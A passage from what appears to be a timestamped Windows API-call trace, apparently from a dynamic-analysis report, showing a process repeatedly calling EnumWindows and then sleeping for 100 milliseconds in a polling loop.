lParam=0x550000) [0226.934] Sleep (dwMilliseconds=0x64) [0226.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0226.969] Sleep (dwMilliseconds=0x64) [0227.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.020] Sleep (dwMilliseconds=0x64) [0227.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.031] Sleep (dwMilliseconds=0x64) [0227.078] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.079] Sleep (dwMilliseconds=0x64) [0227.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.156] Sleep (dwMilliseconds=0x64) [0227.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.172] Sleep (dwMilliseconds=0x64) [0227.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.219] Sleep (dwMilliseconds=0x64) [0227.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.251] Sleep (dwMilliseconds=0x64) [0227.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.263] Sleep (dwMilliseconds=0x64) [0227.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.279] Sleep (dwMilliseconds=0x64) [0227.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.325] Sleep (dwMilliseconds=0x64) [0227.374] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.375] Sleep (dwMilliseconds=0x64) [0227.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.500] Sleep (dwMilliseconds=0x64) [0227.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.547] Sleep (dwMilliseconds=0x64) [0227.593] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.594] Sleep (dwMilliseconds=0x64) [0227.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.657] Sleep (dwMilliseconds=0x64) [0227.690] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.691] Sleep (dwMilliseconds=0x64) [0227.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.703] Sleep (dwMilliseconds=0x64) [0227.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.719] Sleep (dwMilliseconds=0x64) [0227.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.766] Sleep (dwMilliseconds=0x64) [0227.786] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.787] Sleep (dwMilliseconds=0x64) [0227.793] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.794] Sleep (dwMilliseconds=0x64) [0227.813] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.814] Sleep (dwMilliseconds=0x64) [0227.858] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.859] Sleep (dwMilliseconds=0x64) [0227.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.875] Sleep (dwMilliseconds=0x64) [0227.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.904] Sleep (dwMilliseconds=0x64) [0227.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.953] Sleep (dwMilliseconds=0x64) [0227.987] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.988] Sleep (dwMilliseconds=0x64) [0227.998] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0227.999] Sleep (dwMilliseconds=0x64) [0228.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.015] Sleep (dwMilliseconds=0x64) [0228.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.063] Sleep (dwMilliseconds=0x64) [0228.088] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.089] Sleep (dwMilliseconds=0x64) [0228.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.141] Sleep (dwMilliseconds=0x64) [0228.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.188] Sleep (dwMilliseconds=0x64) [0228.207] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.208] Sleep (dwMilliseconds=0x64) [0228.217] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.218] Sleep (dwMilliseconds=0x64) [0228.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.250] Sleep (dwMilliseconds=0x64) [0228.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.298] Sleep (dwMilliseconds=0x64) [0228.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.359] Sleep (dwMilliseconds=0x64) [0228.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.391] Sleep (dwMilliseconds=0x64) [0228.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.406] Sleep (dwMilliseconds=0x64) [0228.421] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.422] Sleep (dwMilliseconds=0x64) [0228.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.470] Sleep (dwMilliseconds=0x64) [0228.503] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.503] Sleep (dwMilliseconds=0x64) [0228.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.513] Sleep (dwMilliseconds=0x64) [0228.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.531] Sleep (dwMilliseconds=0x64) [0228.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.578] Sleep (dwMilliseconds=0x64) [0228.597] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.597] Sleep (dwMilliseconds=0x64) [0228.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.606] Sleep (dwMilliseconds=0x64) [0228.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.641] Sleep (dwMilliseconds=0x64) [0228.686] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.687] Sleep (dwMilliseconds=0x64) [0228.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.750] Sleep (dwMilliseconds=0x64) [0228.784] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.785] Sleep (dwMilliseconds=0x64) [0228.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.797] Sleep (dwMilliseconds=0x64) [0228.813] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.814] Sleep (dwMilliseconds=0x64) [0228.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.861] Sleep (dwMilliseconds=0x64) [0228.928] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.929] Sleep (dwMilliseconds=0x64) [0228.943] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.947] Sleep (dwMilliseconds=0x64) [0228.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.950] Sleep (dwMilliseconds=0x64) [0228.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0228.985] Sleep (dwMilliseconds=0x64) [0229.032] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.034] Sleep (dwMilliseconds=0x64) [0229.071] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.072] Sleep (dwMilliseconds=0x64) [0229.126] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.127] Sleep (dwMilliseconds=0x64) [0229.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.172] Sleep (dwMilliseconds=0x64) [0229.195] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.196] Sleep (dwMilliseconds=0x64) [0229.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.200] Sleep (dwMilliseconds=0x64) [0229.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.219] Sleep (dwMilliseconds=0x64) [0229.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.265] Sleep (dwMilliseconds=0x64) [0229.284] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.285] Sleep (dwMilliseconds=0x64) [0229.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.294] Sleep (dwMilliseconds=0x64) [0229.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.328] Sleep (dwMilliseconds=0x64) [0229.511] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.513] Sleep (dwMilliseconds=0x64) [0229.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.608] Sleep (dwMilliseconds=0x64) [0229.707] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.708] Sleep (dwMilliseconds=0x64) [0229.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.749] Sleep (dwMilliseconds=0x64) [0229.857] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.858] Sleep (dwMilliseconds=0x64) [0229.917] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.918] Sleep (dwMilliseconds=0x64) [0229.936] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0229.937] Sleep (dwMilliseconds=0x64) [0230.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.001] Sleep (dwMilliseconds=0x64) [0230.033] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.034] Sleep (dwMilliseconds=0x64) [0230.124] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.125] Sleep (dwMilliseconds=0x64) [0230.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.203] Sleep (dwMilliseconds=0x64) [0230.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.250] Sleep (dwMilliseconds=0x64) [0230.292] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.293] Sleep (dwMilliseconds=0x64) [0230.309] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.310] Sleep (dwMilliseconds=0x64) [0230.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.359] Sleep (dwMilliseconds=0x64) [0230.397] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.397] Sleep (dwMilliseconds=0x64) [0230.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.403] Sleep (dwMilliseconds=0x64) [0230.421] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.421] Sleep (dwMilliseconds=0x64) [0230.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.468] Sleep (dwMilliseconds=0x64) [0230.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.484] Sleep (dwMilliseconds=0x64) [0230.502] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.503] Sleep (dwMilliseconds=0x64) [0230.532] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.533] Sleep (dwMilliseconds=0x64) [0230.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.580] Sleep (dwMilliseconds=0x64) [0230.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.638] Sleep (dwMilliseconds=0x64) [0230.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.704] Sleep (dwMilliseconds=0x64) [0230.740] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.741] Sleep (dwMilliseconds=0x64) [0230.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.749] Sleep (dwMilliseconds=0x64) [0230.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.766] Sleep (dwMilliseconds=0x64) [0230.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.813] Sleep (dwMilliseconds=0x64) [0230.833] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.833] Sleep (dwMilliseconds=0x64) [0230.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.841] Sleep (dwMilliseconds=0x64) [0230.860] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.861] Sleep (dwMilliseconds=0x64) [0230.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.906] Sleep (dwMilliseconds=0x64) [0230.931] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.932] Sleep (dwMilliseconds=0x64) [0230.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0230.934] Sleep (dwMilliseconds=0x64) [0231.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.064] Sleep (dwMilliseconds=0x64) [0231.120] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.122] Sleep (dwMilliseconds=0x64) [0231.232] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.233] Sleep (dwMilliseconds=0x64) [0231.282] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.283] Sleep (dwMilliseconds=0x64) [0231.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.344] Sleep (dwMilliseconds=0x64) [0231.378] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.379] Sleep (dwMilliseconds=0x64) [0231.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.394] Sleep (dwMilliseconds=0x64) [0231.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.403] Sleep (dwMilliseconds=0x64) [0231.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.453] Sleep (dwMilliseconds=0x64) [0231.479] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.480] Sleep (dwMilliseconds=0x64) [0231.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.498] Sleep (dwMilliseconds=0x64) [0231.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.544] Sleep (dwMilliseconds=0x64) [0231.567] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.568] Sleep (dwMilliseconds=0x64) [0231.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.610] Sleep (dwMilliseconds=0x64) [0231.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.657] Sleep (dwMilliseconds=0x64) [0231.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.718] Sleep (dwMilliseconds=0x64) [0231.786] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.787] Sleep (dwMilliseconds=0x64) [0231.815] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.816] Sleep (dwMilliseconds=0x64) [0231.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.825] Sleep (dwMilliseconds=0x64) [0231.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.842] Sleep (dwMilliseconds=0x64) [0231.898] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.900] Sleep (dwMilliseconds=0x64) [0231.915] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.916] Sleep (dwMilliseconds=0x64) [0231.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.919] Sleep (dwMilliseconds=0x64) [0231.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.951] Sleep (dwMilliseconds=0x64) [0231.992] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.992] Sleep (dwMilliseconds=0x64) [0231.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0231.998] Sleep (dwMilliseconds=0x64) [0232.043] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.045] Sleep (dwMilliseconds=0x64) [0232.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.078] Sleep (dwMilliseconds=0x64) [0232.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.092] Sleep (dwMilliseconds=0x64) [0232.123] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.124] Sleep (dwMilliseconds=0x64) [0232.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.248] Sleep (dwMilliseconds=0x64) [0232.274] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.275] Sleep (dwMilliseconds=0x64) [0232.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.278] Sleep (dwMilliseconds=0x64) [0232.293] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.294] Sleep (dwMilliseconds=0x64) [0232.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.346] Sleep (dwMilliseconds=0x64) [0232.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.358] Sleep (dwMilliseconds=0x64) [0232.371] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.373] Sleep (dwMilliseconds=0x64) [0232.429] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.519] Sleep (dwMilliseconds=0x64) [0232.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.529] Sleep (dwMilliseconds=0x64) [0232.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.544] Sleep (dwMilliseconds=0x64) [0232.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.567] Sleep (dwMilliseconds=0x64) [0232.576] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.577] Sleep (dwMilliseconds=0x64) [0232.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.591] Sleep (dwMilliseconds=0x64) [0232.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.609] Sleep (dwMilliseconds=0x64) [0232.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.622] Sleep (dwMilliseconds=0x64) [0232.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.638] Sleep (dwMilliseconds=0x64) [0232.655] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.656] Sleep (dwMilliseconds=0x64) [0232.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.673] Sleep (dwMilliseconds=0x64) [0232.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.685] Sleep (dwMilliseconds=0x64) [0232.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.703] Sleep (dwMilliseconds=0x64) [0232.718] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.719] Sleep (dwMilliseconds=0x64) [0232.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.734] Sleep (dwMilliseconds=0x64) [0232.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.751] Sleep (dwMilliseconds=0x64) [0232.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.766] Sleep (dwMilliseconds=0x64) [0232.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.779] Sleep (dwMilliseconds=0x64) [0232.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.797] Sleep (dwMilliseconds=0x64) [0232.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.814] Sleep (dwMilliseconds=0x64) [0232.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.829] Sleep (dwMilliseconds=0x64) [0232.843] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.844] Sleep (dwMilliseconds=0x64) [0232.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.860] Sleep (dwMilliseconds=0x64) [0232.888] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.890] Sleep (dwMilliseconds=0x64) [0232.902] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.903] Sleep (dwMilliseconds=0x64) [0232.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0232.954] Sleep (dwMilliseconds=0x64) [0233.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.001] Sleep (dwMilliseconds=0x64) [0233.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.078] Sleep (dwMilliseconds=0x64) [0233.147] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.148] Sleep (dwMilliseconds=0x64) [0233.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.156] Sleep (dwMilliseconds=0x64) [0233.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.170] Sleep (dwMilliseconds=0x64) [0233.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.250] Sleep (dwMilliseconds=0x64) [0233.284] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.285] Sleep (dwMilliseconds=0x64) [0233.402] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.404] Sleep (dwMilliseconds=0x64) [0233.503] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.504] Sleep (dwMilliseconds=0x64) [0233.701] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.702] Sleep (dwMilliseconds=0x64) [0233.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0233.951] Sleep (dwMilliseconds=0x64) [0234.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.156] Sleep (dwMilliseconds=0x64) [0234.322] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.323] Sleep (dwMilliseconds=0x64) [0234.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.545] Sleep (dwMilliseconds=0x64) [0234.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.671] Sleep (dwMilliseconds=0x64) [0234.816] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.817] Sleep (dwMilliseconds=0x64) [0234.926] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0234.927] Sleep (dwMilliseconds=0x64) [0235.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.015] Sleep (dwMilliseconds=0x64) [0235.119] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.120] Sleep (dwMilliseconds=0x64) [0235.164] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.166] Sleep (dwMilliseconds=0x64) [0235.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.173] Sleep (dwMilliseconds=0x64) [0235.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.201] Sleep (dwMilliseconds=0x64) [0235.279] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.280] Sleep (dwMilliseconds=0x64) [0235.339] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.339] Sleep (dwMilliseconds=0x64) [0235.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.406] Sleep (dwMilliseconds=0x64) [0235.485] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.485] Sleep (dwMilliseconds=0x64) [0235.538] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.539] Sleep (dwMilliseconds=0x64) [0235.581] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.583] Sleep (dwMilliseconds=0x64) [0235.611] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.611] Sleep (dwMilliseconds=0x64) [0235.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.622] Sleep (dwMilliseconds=0x64) [0235.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.639] Sleep (dwMilliseconds=0x64) [0235.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.685] Sleep (dwMilliseconds=0x64) [0235.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.842] Sleep (dwMilliseconds=0x64) [0235.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0235.954] Sleep (dwMilliseconds=0x64) [0236.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.048] Sleep (dwMilliseconds=0x64) [0236.191] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.192] Sleep (dwMilliseconds=0x64) [0236.351] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.352] Sleep (dwMilliseconds=0x64) [0236.411] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.412] Sleep (dwMilliseconds=0x64) [0236.451] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.452] Sleep (dwMilliseconds=0x64) [0236.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.466] Sleep (dwMilliseconds=0x64) [0236.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.529] Sleep (dwMilliseconds=0x64) [0236.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.624] Sleep (dwMilliseconds=0x64) [0236.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.685] Sleep (dwMilliseconds=0x64) [0236.759] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.760] Sleep (dwMilliseconds=0x64) [0236.795] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.796] Sleep (dwMilliseconds=0x64) [0236.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0236.842] Sleep (dwMilliseconds=0x64) [0237.053] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.054] Sleep (dwMilliseconds=0x64) [0237.161] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.162] Sleep (dwMilliseconds=0x64) [0237.219] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.220] Sleep (dwMilliseconds=0x64) [0237.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.358] Sleep (dwMilliseconds=0x64) [0237.420] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.421] Sleep (dwMilliseconds=0x64) [0237.461] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.462] Sleep (dwMilliseconds=0x64) [0237.501] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.502] Sleep (dwMilliseconds=0x64) [0237.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.556] Sleep (dwMilliseconds=0x64) [0237.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.576] Sleep (dwMilliseconds=0x64) [0237.711] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.712] Sleep (dwMilliseconds=0x64) [0237.791] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.792] Sleep (dwMilliseconds=0x64) [0237.854] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.855] Sleep (dwMilliseconds=0x64) [0237.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0237.938] Sleep (dwMilliseconds=0x64) [0238.006] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.010] Sleep (dwMilliseconds=0x64) [0238.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.014] Sleep (dwMilliseconds=0x64) [0238.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.032] Sleep (dwMilliseconds=0x64) [0238.077] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.078] Sleep (dwMilliseconds=0x64) [0238.214] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.215] Sleep (dwMilliseconds=0x64) [0238.301] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.302] Sleep (dwMilliseconds=0x64) [0238.420] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.421] Sleep (dwMilliseconds=0x64) [0238.477] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.477] Sleep (dwMilliseconds=0x64) [0238.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.532] Sleep (dwMilliseconds=0x64) [0238.612] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.613] Sleep (dwMilliseconds=0x64) [0238.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.672] Sleep (dwMilliseconds=0x64) [0238.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.720] Sleep (dwMilliseconds=0x64) [0238.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0238.813] Sleep (dwMilliseconds=0x64) [0238.930] EnumWindows 